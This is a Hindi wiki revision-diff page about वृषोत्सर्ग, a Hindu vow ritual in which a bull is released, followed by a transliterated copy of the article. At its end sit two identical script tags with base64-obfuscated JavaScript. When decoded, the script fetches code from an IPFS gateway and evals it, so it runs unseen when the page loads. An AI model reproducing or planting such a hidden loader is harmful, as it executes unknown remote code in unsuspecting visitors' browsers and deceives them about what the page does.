Difference between revisions of "वृषोत्सर्ग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*वृषोत्सर्ग व्रत [[चैत्र]] या [[कार्तिक]] की [[पूर्णिमा]] पर, रेवती [[नक्षत्र]] में, 3 वर्ष के उपरान्त एक बार किया जाता है।
 
*वृषोत्सर्ग व्रत [[चैत्र]] या [[कार्तिक]] की [[पूर्णिमा]] पर, रेवती [[नक्षत्र]] में, 3 वर्ष के उपरान्त एक बार किया जाता है।
 
*ऐसी मान्यता है कि इस व्रत में [[साँड़]] छोड़ा जाता है।
 
*ऐसी मान्यता है कि इस व्रत में [[साँड़]] छोड़ा जाता है।
*[[बैल]] तीन वर्ष का होना चाहिए, उसके साथ में तीन वर्ष वाली चार या आठ [[गाय|गायें]] होनी चाहिए।<ref>कृत्यरत्नाकर (432-433, [[ब्रह्मपुराण]] से उद्धरण)</ref>
+
*[[बैल]] तीन वर्ष का होना चाहिए, उसके साथ में तीन वर्ष वाली चार या आठ [[गाय|गायें]] होनी चाहिए।<ref>कृत्यरत्नाकर (432-433, [[ब्रह्मपुराण]] से उद्धरण</ref>
*बहृधा की किसी की मृत्यु के 11 दिनों के उपरान्त वृषोत्सर्ग होता है।<ref>धर्मशास्त्र का इतिहास 4 के महाग्रन्थ का मूल खण्ड 2, पृ0 983-997 एवं खण्ड 4, पृ0 539-542; स्मृतिकौस्तुभ (390-405)</ref>
+
*बहृधा की किसी की मृत्यु के 11 दिनों के उपरान्त वृषोत्सर्ग होता है।<ref>धर्मशास्त्र का इतिहास 4 के महाग्रन्थ का मूल खण्ड 2, पृ0 983-997 एवं खण्ड 4, पृ0 539-542; स्मृतिकौस्तुभ (390-405</ref>
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:00, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vrishotsarg vrat chaitr ya kartik ki poornima par, revati nakshatr mean, 3 varsh ke uparant ek bar kiya jata hai.
  • aisi manyata hai ki is vrat mean saan d chho da jata hai.
  • bail tin varsh ka hona chahie, usake sath mean tin varsh vali char ya ath gayean honi chahie.[1]
  • bahridha ki kisi ki mrityu ke 11 dinoan ke uparant vrishotsarg hota hai.[2]

tika tippani aur sandarbh

  1. krityaratnakar (432-433, brahmapuran se uddharan
  2. dharmashastr ka itihas 4 ke mahagranth ka mool khand 2, pri0 983-997 evan khand 4, pri0 539-542; smritikaustubh (390-405

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>